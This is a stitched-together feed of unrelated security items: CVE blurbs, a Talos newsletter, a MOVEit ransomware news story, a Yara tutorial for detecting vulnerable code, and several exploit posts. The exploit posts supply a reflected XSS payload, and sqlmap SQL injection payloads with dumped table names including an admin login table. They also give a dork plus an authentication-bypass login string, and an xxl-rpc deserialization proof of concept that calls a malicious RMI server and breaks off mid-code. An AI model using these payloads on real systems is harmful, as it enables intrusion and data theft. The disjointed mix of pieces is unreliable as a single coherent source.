Incorrect access control in Chamilo 1.11.* up to 1.11.18 allows a student subscribed to a given course to download documents belonging to another student if they know the document's ID.

CVE-2023-34958: Security issues - Chamilo LMS

An issue in Chamilo v1.11.* up to v1.11.18 allows attackers to execute a Server-Side Request Forgery (SSRF) and obtain information on the services running on the server via crafted requests in the social and links tools.

CVE-2023-34959: Security issues - Chamilo LMS

Chamilo v1.11.x up to v1.11.18 was discovered to contain a cross-site scripting (XSS) vulnerability via the /feedback/comment field.

CVE-2023-34961: Security issues - Chamilo LMS

YouTube released a statement that “we will stop removing content that advances false claims that widespread fraud, errors, or glitches occurred in the 2020 and other past US Presidential elections.”

Thursday, June 8, 2023 14:06

Welcome to this week’s edition of the Threat Source newsletter.

In the wake of the 2016 and 2020 presidential elections, it seemed like big tech companies were taking the fight against disinformation seriously. Social media outlets set up new fact-checking procedures and got more aggressive about banning or blocking pages and profiles that spread disinformation around elections.

Now I’m worried we’re already moving backward with another presidential election just around the corner (somehow).

In November, Twitter laid off a huge swath of its staff that heavily affected the teams tasked with keeping misinformation and fake news off the platform. Google reportedly laid off several experts on the matter at YouTube, leaving only one person solely in charge of the platform’s misinformation policy worldwide.

Then last week, YouTube announced it was changing its policy on removing videos that spread misinformation about the results of the 2020 election. Politicians and online personalities have repeatedly tried to spread lies that the presidential election that year was rigged in favor of U.S. President Joe Biden, despite there not being any concrete evidence of voter fraud. The former administration was also doing plenty to sow distrust around mail-in ballots prior to the election.

YouTube’s misinformation policies states that it reserves the right to remove any content from the platform that is “Content advancing false claims that widespread fraud, errors, or glitches occurred in certain past elections to determine heads of government.”

It specifically lists the 2021 German federal election and the 2014, 2018, and 2022 Brazilian Presidential elections as examples of where they are looking for this type of content. Weirdly, the U.S. presidential elections aren’t named anywhere, and instead, YouTube released a statement that “we will stop removing content that advances false claims that widespread fraud, errors, or glitches occurred in the 2020 and other past US Presidential elections.”

The company said that “In the current environment, we find that while removing this content does curb some misinformation, it could also have the unintended effect of curtailing political speech without meaningfully reducing the risk of violence or other real-world harm.”

These types of reversals are likely the result of a few things — companies are currently cutting the sizes of their workforce after staffing up during the COVID-19 pandemic, and these misinformation-fighting teams seem like an easy line item to cut now that we’re three years removed from the 2020 election. It also seems like these false claims around the election have largely “blown over” among the general public, so there is not nearly as much pressure on these outlets to enforce these rules as there may have been in the immediate aftermath of the attempted insurrection on the U.S. Capitol in January 2021.

This sets up history to repeat itself during the 2024 election cycle. People start spreading lies and sowing doubt about the outcome of the election before any ballots are even cast, we all get upset and pressure these companies into doing something, and then a few years later when no one is looking, they can make cuts in these areas.

As Talos has written about previously, there are several facets to disinformation campaigns. There is no one-size-fits-all solution that will just make our fake news problem go away. But giving up on many of those solutions just a few years into trying them is not the answer, either.

**The one big thing**

Cisco Talos Incident Response is reporting increased attacks utilizing stolen vendor or other third-party account credentials. These are accounts created for third-party workforce members – employees of external partner organizations that maintain physical or virtual access to an organization’s environment. Attackers are stealing these login credentials to carry out software supply chain attacks and quietly sitting on targeted networks, which can often be overlooked when major supply chain attacks involving phony updates dominate the headlines.

**Why do I care?**

These accounts are frequently leveraged for initial access and then used to move laterally through the organization’s network, especially when the victim hasn’t deployed multi-factor authentication (MFA). Since VCAs are usually given elevated permissions, theft of these credentials will often result in widespread damage to victim assets and could even be used to move along the initial victim’s supply chain. Any organization that works with an outside third party for things from software to support is at risk of falling victim to this type of threat.

**So now what?**

Talos’ blog outlines several steps organizations can take to protect against the worst-case scenario. One of the easiest steps an IT or infosec team can take to protect their VCAs is to disable them when they’re not needed. Or adopt the principle of least privilege across the network for all accounts, whether they’re a vendor or not.

**Top security headlines of the week**

Threat actors are **actively exploiting a zero-day exploit in Progress Software's MOVEit Transfer app** to steal data from a wide range of companies and organizations, including the government of Nova Scotia and British Airways. Microsoft reported that the attacks can be attributed to the CLOP ransomware group, along with follow-on attacks that are the result of the attackers infiltrating Zellis, a U.K. payroll company. The MOVEit vulnerability, CVE-2023-34362, could allow an attacker to gain access to the software’s database, and then infer information about the structure of said database and execute SQL statements that could alter the database or delete information. Progress issued a patch for the vulnerability last week but said it had been exploited as early as May. Staff at the affected companies have been warned that personal data could be at risk, including U.K. national insurance numbers and bank account details. (Dark Reading, BBC)

**Google released an emergency patch for its Chrome web browser to fix a high-severity zero-day vulnerability.** As of Tuesday afternoon, only limited details about CVE-2023-3079 were available. Google says it’s a type confusion vulnerability in the V8 JavaScript engine that Chrome and other Chromium-based browsers like Microsoft Edge use. Google’s Threat Analysis Group said that a commercial spyware vendor has already leveraged the vulnerability. This is the third zero-day vulnerability Google has disclosed in Chrome this year. (SecurityWeek, PCMag)

**Microsoft Outlook’s mobile app and web app experienced intermittent outages on Monday and Tuesday,** with a hacktivist claiming responsibility for a distributed denial-of-service attack. Microsoft said the issue stemmed from technical errors in the product, but a group known as Anonymous Sudan says it was behind the disruptions, claiming responsibility while saying it was protesting the U.S.’s involvement in Sudanese affairs. The group said on its Telegram channel that it would “continue to target large US companies, government and infrastructure.” Anonymous Sudan was also behind recent DDoS attacks against Swedish airline SAS and nine hospitals in Denmark. (The Register, Bleeping Computer)

**Can’t get enough Talos?**

*   Researcher Spotlight: How Joe Marshall helps defend everything from electrical grids to grain co-ops across multiple continents
*   Cybersecurity for businesses of all sizes: A blueprint for protection
*   Talos Takes Ep. #141: The Predator spyware and more "mercenary" groups
*   Horabot campaign targeted businesses for more than two years before finally being discovered
*   Horabot Campaign Targets Spanish-Speaking Users in the Americas

**Upcoming events where you can find Talos**

**Discover Cyber Workshop for Women (June 8)**

Doha, Qatar

**REcon** **(June 9 - 11)**

Montreal, Canada

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** a8a6d67140ac6cfec88b748b8057e958a825224fcc619ed95750acbd1d7a4848  
**MD5:** 8cb26e5b687cafb66e65e4fc71ec4d63  
**Typical Filename:** dattService.exe  
**Claimed Product:** Datto Service Monito  
**Detection Name:** W32.Auto:a8a6d6.in03.Talos

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa  
**MD5:** df11b3105df8d7c70e7b501e210e3cc3  
**Typical Filename:** DOC001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** 7c8e1dba5c1b84a08636d9e6f225e1e79bb346c176e0ee2ae1dfec18953a1ce2  
**MD5:** 3e0fb82ed8ea6cd7d1f1bb9dca5f2bdc  
**Typical Filename:** PDFShark.exe  
**Claimed Product:** PDFShark  
**Detection Name:** Win.Dropper.Razy::95.sbx.tg

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

Now’s not the time to take our foot off the gas when it comes to fighting disinformation online

Expert Restaurant eCommerce version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/20872/                                      ││  Vendor   : Expert IT Solution                                                         ││  Software : Expert Restaurant eCommerce 1.0                                            ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /food_details.phpGET parameter 'food' is vulnerable to RXSShttps://www.website/food_details.php?food=e11c0"><script>alert(1)</script>uuf50[-] Done

Expert Restaurant eCommerce 1.0 Cross Site Scripting

Expert Restaurant eCommerce version 1.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/20872/                                      ││  Vendor   : Expert IT Solution                                                         ││  Software : Expert Restaurant eCommerce 1.0                                            ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /food_details.phphttps://www.website/food_details.php?food=[SQLI]GET parameter 'food' is vulnerable to SQL Injection---Parameter: food (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: food=1' AND 8591=8591 AND 'bGwn'='bGwn    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: food=1' AND (SELECT 8111 FROM (SELECT(SLEEP(5)))Tejf) AND 'cFVV'='cFVV    Type: UNION query    Title: Generic UNION query (NULL) - 17 columns    Payload: food=-8249' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b6a71,0x646241754464636d7a616e515664594d665268756c73555855704a4d6f7550666543495077594a71,0x716a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----[+] Starting the Attackfetching current databasecurrent database: 'sagor_****_restu'fetching tables[34 tables]+--------------------------+| add_to_cart_view         || admin_url                || contact_manage           || currencies               || customer_info            || delivery_live_status     || expense_manage           || food_category            || food_dish_manage         || food_dish_vari_man       || food_field_variant       || food_field_variant_value || food_order_confirm       || food_review              || food_sub_category        || food_tag                 || gallery_manage           || hall_manage              || income_manage            || kitchen_live_sta         || menu_manage              || opening_manage           || order_accounts           || order_other_address      || page_manage              || payment_gateway          || shipping_charge          || site_setting             || slider_manage            || social_manage            || sup_ad_log               || table_book               || table_manage             || team_manage              |+--------------------------+fetching columns for table 'sup_ad_log'[5 columns]+----------------+--------------+| Column         | Type         |+----------------+--------------+| status         | varchar(100) || id             | int(11)      || sup_admin_name | varchar(100) || sup_pass       | varchar(100) || sup_user       | varchar(100) |+----------------+--------------+[-] Done

Expert Restaurant eCommerce 1.0 SQL Injection

NETXPERTS CMS version 0.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : NETXPERTS-CMS v0.1 Auth By Pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : http://netxperts.in/                                                                                               |  | # Dork      : "Designed by NETXPERTS"                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user : 1'or'1'='1 & Pass : 1'or'1'='1[+] https://127.0.0.1/sivasudartravels/admin/production.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

NETXPERTS CMS 0.1 SQL Injection

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have published a joint advisory regarding the active exploitation of a recently disclosed critical flaw in Progress Software's MOVEit Transfer application to drop ransomware.
"The Cl0p Ransomware Gang, also known as TA505, reportedly began exploiting a previously unknown SQL injection

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have published a joint advisory regarding the active exploitation of a recently disclosed critical flaw in Progress Software's MOVEit Transfer application to drop ransomware.

"The Cl0p Ransomware Gang, also known as TA505, reportedly began exploiting a previously unknown SQL injection vulnerability in Progress Software's managed file transfer (MFT) solution known as MOVEit Transfer," the agencies said.

"Internet-facing MOVEit Transfer web applications were infected with a web shell named LEMURLOOT, which was then used to steal data from underlying MOVEit Transfer databases."

The prolific cybercrime gang has since issued an ultimatum to several impacted businesses, urging them to get in touch by June 14, 2023, or risk getting all their stolen data published.

Microsoft is tracking the activity under the moniker Lace Tempest (aka Storm-0950), which has also been implicated in the exploitation of a critical security vulnerability in PaperCut servers.

Active since at least February 2019, the adversary has been linked to a wide range of activities in the cybercrime ecosystem, including operating a ransomware-as-a-service (RaaS) and acting as an affiliate for other RaaS schemes.

It has also been observed acting as an initial access broker (IAB) to profit off access to compromised enterprise networks and also as a customer of other IABs, underscoring the interconnected nature of the threat landscape.

Source: Kroll

The abuse of CVE-2023-34362, an SQL injection flaw in MOVEit Transfer, is a sign of the adversary continuously seeking zero-day exploits in internet-facing applications and using them to their advantage in order to extort victims.

It's worth noting that Cl0p carried out similar mass exploitation attacks on other managed file transfer applications such as Accellion FTA and GoAnywhere MFT over the past year.

Attack surface management firm Censys said it has observed a drop in the number of hosts running exposed MOVEit Transfer instances from over 3,000 hosts to little more than 2,600.

"Several of these hosts are associated with high-profile organizations, including multiple Fortune 500 companies and both state and federal government agencies," Censys noted, highlighting finance, technology, and healthcare as the sectors with the most exposures.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

**Kroll**, in an analysis shared with The Hacker News, said it identified activity indicating that the Clop threat actors were likely experimenting with ways to exploit this particular flaw in April 2022 and as far back as July 2021.

The finding is particularly significant as it serves to illustrate the attacker's technical expertise and the planning that has gone into staging the intrusions much before the recent wave of exploitations began.

"Commands during the July 2021 time frame appeared to be run over a longer amount of time, suggesting that testing may have been a manual process at that point before the group created an automated solution that it began testing in April 2022," Kroll said.

The July 2021 exploitation is said to have originated from an IP address (45.129.137\[.\]232) that was previously attributed to the Cl0p actor in connection with attempts to exploit flaws in SolarWinds Serv-U product around the same time.

"This is the third time Cl0p ransomware group have used a zero day in webapps for extortion in three years," security researcher Kevin Beaumont said. "In all three cases they were products with security in the branding."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Clop Ransomware Gang Likely Exploiting MOVEit Transfer Vulnerability Since 2021

Intro Intro Finding vulnerabilities in software is no easy task by itself. Doing this at cloud scale is very challenging to perform manually, and we use tools to help us identify patterns or vulnerability signatures. Yara is one of those tools.
Yara is a very popular tool with Blue teams, malware researchers, and for good reason.

**Intro Intro**

Finding vulnerabilities in software is no easy task by itself.  Doing this at cloud scale is very challenging to perform manually, and we use tools to help us identify patterns or _vulnerability signatures_.  Yara is one of those tools.

Yara is a very popular tool with Blue teams, malware researchers, and for good reason. Once a malicious pattern has been identified, it’s quite easy to write rules to detect it in huge collections of files.

In this article, we will discuss another way that Yara can be used from an AppSec/Red Team approach. We’ll look at how we can create rules that will match different types of software vulnerabilities. Among the examples, we’ll have deserialization vulnerabilities that can lead to arbitrary code execution, command injection vulnerabilities, and even loose regular expressions that can be bypassed and may lead to SSRFs, just to name a few.

This is not intended to be an exhaustive list.

**Examples Examples****C# C#**

Below we’ll look at several examples of potentially vulnerable C# code.

**Binary Formatter Binary Formatter**

Let’s say we encounter a code similar to the one below:

    static string GetClientEmail()
    {
        string json = GetData();
        BinaryFormatter formatter = new BinaryFormatter();
        FileStream fs = File.Open(@"client.txt", FileMode.Open);
        object obj = formatter.Deserialize(fs);
        Account acobj = (Account)obj;
        return acobj.Email;
    }
    

Any use of BinaryFormatter with arbitrary/untrusted data (such as in the example above) is insecure.  The usage cannot be made secure because its Deserialize() method will check first the type provided in the file stream and then do any casts. An arbitrary crafted payload will exploit this functionality and execute malicious code.  Unlike other formatters, this cannot be mitigated by implementing a  SerializationBinder.  .NET considers this behavior as by design and will not issue a mitigation to modify it.

**NewtonSoft.Json NewtonSoft.Json**

The next vulnerability targets deserialization of an untrusted JSON payload using the Newtonsoft JSON library.  When TypeNameHandling has been set to “Objects” or “All”, this allows the JSON.NET library to check for the object type in the data provided:

    private static JsonSerializerSettings jsonSerializerSettings = new JsonSerializerSettings 
    { 
        TypeNameHandling = TypeNameHandling.All;
        // As a side note, this also works if we use Objects instead of All. 
        TypeNameHandling = TypeNameHandling.Objects;
    };
    

If an attacker is able to modify the serialized data, then this may allow malicious object types to be added which can be used to execute arbitrary commands. If this setting has been set to ‘None’, or not been specified at all (in which case it will default to ‘None’), that will mean that the DeserializeObject function in the examples below does not check the type of the string supplied as input (‘json’ in the examples below), which ensures no unsafe types given as user input are deserialized.

**Example 1:**

    static string GetClientEmail()
    {
        string json = GetData();
        var acobj = JsonConvert.DeserializeObject<Object>(json, jsonSerializerSettings);
        Account account = (Account)acobj;
        return account.Email;
    }
    

**Example 2:**

    static string GetClientEmail()
    {
        string json = GetData();
        var acobj = (Account)JsonConvert.DeserializeObject<Object>(json, jsonSerializerSettings);
        Account account = (Account)acobj;
        return account.Email;
    }
    

Both the examples above try to convert the object to our custom type ‘Account’: however, this isn’t successful as the malicious payload already executes before that happens. This is because whenever we have generic types such as ‘var’ or <Object>, the JsonConvert function looks into the payload string and tries to guess the type and then tries to deserialize it. When deserializing certain objects such as the generic ones in this example, their constructors get called first which can contain malicious executables.

**Example 3:**

    static string GetClientEmail()
    {
        string json = GetData();
        Account acobj = (Account)JsonConvert.DeserializeObject<Account>(json, jsonSerializerSettings);
        return acobj.Email;
    }
    

The code above can still be vulnerable to unsafe deserialization if our type ‘Account’ has any public generic objects, or contains any classes that may in turn contain generic objects:

    public class Account
    {
        public string Email { get; set; }
        public string Active { get; set; }
        public object Details;
        public XYZ x;
    }
    
    public class XYZ
    {
        public object z;
    }
    

**Code injection Code injection**

Here is an example in C# of when user input in the GET parameter ‘FilePath’ is unsafely (there’s no sanitization to detect/remove things like “../” , “&&”, or “|”) passed to System.Diagnostics.ProcessStartInfo(), leading to command injection:

    public async Task<IActionResult> compressAndDownloadFile()
    {
      string filePath = Request.Query["filePath"];
      processStartInfo = new System.Diagnostics.ProcessStartInfo(
        "/bin/bash",
        $"-c \"cat {filePath} | gzip > {filePath}.gz\""
      );
      System.Diagnostics.Process proc = new System.Diagnostics.Process();
      proc.StartInfo = processStartInfo;
      proc.Start();
      
      return File($"{filePath}.gz", "application/gzip");
    }
    

**Loose regular expression Loose regular expression**

Having loose regex in code is a particularly interesting scenario as it could lead to varying vulnerabilities. For example, if you have the code shown below to allow the user to only visit particular subdomains in Azure or any domain of your choice, this validation can be circumvented:

**Example 1:**

    string url_pattern = @".*yourdomain.com"; // Create a Regex
    Regex url_check = new Regex(url_pattern);
    

This allows subdomains of the following patterns, which can lead to the input attacker-supplied prefixes:

1.  “.\*azure.com”
2.  “.\*.azure.com”
3.  “.\*.azure.com”

Here, (1) and (2) can be used to navigate to malicious domains like maliciousazure.com

Additionally, (3) can be used to get to malicious.com/.azure

**Example 2:**

We sometimes also observe loose regular expressions being abused when they’ve been used in client certificates which are used for Service to Service (S2S) authentication. If the code has a containment check instead of an equality check on the common names in a client certificate, this results in any trusted certificate with the correct prefix being authorized, such as:

**Approved Common Name:** guest.azure.com

**Bypassed Common Name:** guest.azure.com.**malicious-domain.com**

**PHP PHP**

Of course, Yara isn’t limited to detecting only vulnerable C# code. Below, we’ll see a few examples of vulnerable PHP code snippets.

Let’s say you encounter a code similar to the one below where a POST parameter is used to build a SQL query. There is no sanitization being done, so this is a classic example of SQL injection.

**Example 1**

    public function get_translation(){ 
    […] 
        $query = "SELECT id, type, status FROM `" .  $_POST[“language_code”] . […]
    

The vulnerable code can be detected with a rule like the following:

    $s1 = /SELECT[^\"]+"\s*\.[^\"]+\$_POST/
    

This will detect this particular vulnerable code and some other variants, but it’s still very specific. What happens if instead of a POST request, the parameter is sent via GET? Or what if the SQL query is not a SELECT but an INSERT?

We can either add more, similar rules or tweak the one we already developed to handle other cases as well:

    $s1 = /\w+\s*=\s*"(SELECT|INSERT|UPDATE)[^\"]+"\s*\.[^\"]+\$_(GET|POST|REQUEST)/
    

In the second example everything depends on the path variable.

**Example 2**

    $path = $_POST[“filepath”]; 
    […] 
    $command = "$path xtag 2>&1";  
    exec($command, $output, $result);
    

This is a classic example of command injection as the attacker controls the filepath POST parameter. It’s relatively easy to create a Yara rule to detect this specific case, but when you’re dealing with functions that execute external programs, it’s sometimes better to review them on a case-by-case basis.

For example, if we want to detect PHP functions that execute commands and have a variable as the first parameter:

    /(escapeshellcmd|exec|system|passthru|popen)\s*\([^\(,]*\$/
    

If you find there are too many false positives, you can tweak and add more checks (like see if $\_GET, $\_POST, or $\_REQUEST strings are present and so on).

**Example 3 (account takeover)**

This detection depends heavily on the implementation. Here we’re looking specifically at a hash function that takes the current time as an argument. Depending on what this is used for, it can lead to an account takeover.

Let’s say that a website has a functionality to reset a user’s password (in case they forgot it). If the attacker knows that a temporary function is generated by using an implementation similar to the example below, then the attacker can generate the password locally, as they already know when they made the request, force a reset for an arbitrary account, and then login with the temporary password.

    function reset_password() { 
    […] 
    $temp_pass          = md5( time() );
    

**Example 4**

    public function renderNav() 
    { 
        […] 
        echo '<input type="hidden" name="pagename" value="' . $_GET['page'] . '"/>';
    

This is a classic XSS (cross site scripting) example.

The value of the page GET variable is directly rendered in the HTML code. There is nothing preventing an attacker from injecting arbitrary HTML or JS code (assuming no CORS).

**JavaScript JavaScript****Missing Cross-Origin Resource Sharing Validation Missing Cross-Origin Resource Sharing Validation**

Window.postMessage provides a secure mechanism for cross origin communication which circumvents the Same Origin Policy. The syntax for this consists of:

    Window.postMessage(message, targetOrigin)
    Window.postMessage(message, targetOrigin, transfer)
    

However, if we specify the targetOrigin to be “\*”, this could expose the data being sent from our website to any malicious site trying to intercept our traffic:

    Window.postMessage(message, "*")
    Window.postMessage(message, "*", transfer)
    

**Yara rules Yara rules**

Below we’ll present a few Yara rules to detect some of the vulnerabilities we’ve already discussed.

All the rules will follow this basic format:

    rule <Rule_Name>
    {
          strings:
                 $<string_name1> = “<string_to_detect>”
                 $<string_name2> = “<another_string_to_detect>”
    
          condition:
                 any of ($< string_name>*)
    }
    

You can easily expand this template by adding comments, metadata, new variable names (you may have to change the condition to reflect those names), etc. There is  very good documentation on how to do that.

Happy hunting!

    rule ProcessStart_Method
    {
        strings:
            $s1 = "Process.Start"
            $s2 = "ProcessStartInfo"
            $s3 = "UseShellExecute"
            $s4 = ".Shell"
            $s5 = "system("
            $s6 = "ProcessEx"
        condition:
            any of ($s*)
    }
    

    rule has_LooseRegex
    {
        strings:
            $s1 = ".*"
        condition:
            any of ($s*)
    }
    

    rule BinaryFormatter_Deserialization
    {
        strings:
            $s1 = "new BinaryFormatter("
            $s2 = "TextFormattingRunProperties"
        condition:
            any of ($s*)
    }
    

    rule LosFormatter_Deserialization
    {
        strings:
            $s1 = "new LosFormatter("
        condition:
            any of ($s*)
    }
    

    rule SoapFormatter_Deserialization
    {
        strings:
            $s1 = "new SoapFormatter("
        condition:
            any of ($s*)
    }
    

    rule NetDataContractSerializer_Deserialization
    {
        strings:
            $s1 = "new NetDataContractSerializer("
        condition:
            any of ($s*)
    }
    

    rule ObjectStateFormatter_Deserialization
    {
        strings:
            $s1 = "new ObjectStateFormatter("
        condition:
            any of ($s*)
    }
    

    rule JsonConvert_Deserialization_newtonsoft
    {
        strings:
            $s1 = "JsonConvert.DeserializeObject<Object"
        condition:
            any of ($s*)
    }
    

**PHP PHP**

    rule PHP_SQLinj
    {
        strings:
            // match var = "SELECT FROM x WHERE pass=" . $_
            $s1 = /\w+\s*=\s*"(SELECT|INSERT|UPDATE)[^\"]+"\s*\.[^\"]+\$_(GET|POST|REQUEST)/
     
        condition:
            any of ($s*)
    }
    

    rule PHP_XSSConcat
    {
        strings:
            $s1 = /echo\s[^\r\n]*\.[^\"\r\n$]*\$_(GET|POST|REQUEST)/
     
        condition:
            any of ($s*)
    }
    

    rule PHP_RCE
    {
        strings:
            $s1 = /\w+\s*=\s*(escapeshellcmd|exec|system|passthru|popen)\s*\([^\(,]*\$/
            $s2 = /[\r\n]+\s*(escapeshellcmd|exec|system|passthru|popen)\s*\([^\(,]*\$/
     
        condition:
            any of ($s*)
    }
    

    rule PHP_Time_Hash
    {
        strings:
            $s1 = /(md5|sha\d+)\(\s*time\($\s*\);/
        condition:
            any of ($s*)
    }
    

    rule PHP_FileInclusion
    {
        strings:
            $s1 = /include$[^$]*\$\_(REQUEST|GET|POST|COOKIE|SERVER|FILES)\[/
     
        condition:
            any of ($s*)
    }
    

    rule missingCORS_js
    {
    strings:
       $s1 = /Window\.postMessage\s*$\w+,\s*["']+\*["']+\s*[,$]+/ nocase
    condition:
             any of ($s*)
    }

Hey Yara, find some vulnerabilities

xxl-rpc v1.7.0 was discovered to contain a deserialization vulnerability via the component com.xxl.rpc.core.remoting.net.impl.netty.codec.NettyDecode#decode.

**XXL-RPC deserialization vulnerability****Brief description**

The xxl-rpc framework utilizes the latest version(4.0.66) of the Hessian to facilitate serialization and deserialization during remote communication processes.

Through code auditing, it is easily discovered that there is a developer-encapsulated serialization processor (currently supporting both Hessian1 and Hessian2 protocols) within the com.xxl.rpc.core.old.serializ package of the xxl-rpc-core module. During runtime, the server and client will invoke the pre-configured serialization processor for deserialization in the com.xxl.rpc.core.remoting.net.impl.netty.codec.NettyDecode#decode method. We found that this method deserialize the inputs without validating, which results in vulnerability.

**Affected versions**

The following uses the latest v1.7.0 as an example to illustrate the attack.

**How to reproduce**

Utilize the official source code of xxl-rpc and the xxl-rpc-samples/xxl-rpc-sample-springboot provided in the usage examples.

**1\. Starting xxl-rpc server**

a. Create necessary directories and files and modify configuration files

Modify the "value" in the second red box to the absolute path of the log file for the newly created client on your local machine.

As above, modify the value in the second red box to the absolute path of the registry data for the newly created local registry on your machine.

And the other configurations needed to edit are as below:

Make sure all of these file are created after editing.

b. Configure the MySQL service locally and import the official database (optional. if an error occurs, maybe you should do this)

I am using Parallels virtual machine locally and have configured PHPStudy inside it. You can find MySQL is integrated in it (You can also install an MySQL on your local machine).

find tables\_xxl\_rpc.sql:

put it on a suitable location and then login to MySQL using the command line, then use the "source" command to import the database:

After that, you should modify the configuration information for the database.

(2) Start Zookeeper and xxl-rpc-sample-springboot-server

For this test, jdk8u92 is chosen. If the jdk version is higher, there may be restrictions on JNDI injection. Of course, there are also ways to bypass this restriction for higher versions. However, to facilitate the reproduction and testing of this vulnerability, for higher versions of jdk, a statement can be added before starting the server of the test:System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");

you need to download the zookeeper and start it by running \`\`

the opened server is as below (the 405 error can be ingored):

**2 Attacker environment setup and launch the attack**

(1) Run malicious RMI service Execute the command java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a /System/Applications/Calculator.app to run the malicious RMI service. If your OS is Windows, you should modify the shell command to cmd /c calc.exe. Successful execution of the command produces the following effect:

(2) Unzip xxl-sendEvil.zip and open it with IDEA (or other IDE). Modify the RUL in PoC2.java to the URL corresponding to the malicious RMI service started in the previous step.

Running PoC2.java will demonstrate the attack effect.

**POC**

package com.xxl.rpc.core.poc;

import com.xxl.rpc.serialize.HessianSerializer;
import com.xxl.rpc.serialize.Serializer;
import org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor;
import org.springframework.beans.factory.BeanFactory;
import org.springframework.jndi.support.SimpleJndiBeanFactory;

import java.io.OutputStream;
import java.net.Socket;

public class PoC2 {

    public static void main(String\[\] args) throws Exception {

      // Remember to modify the RMI URL
        BeanFactory bf =  SpringUtil.makeJNDITrigger("rmi://192.168.31.5:1099/vorbxa");
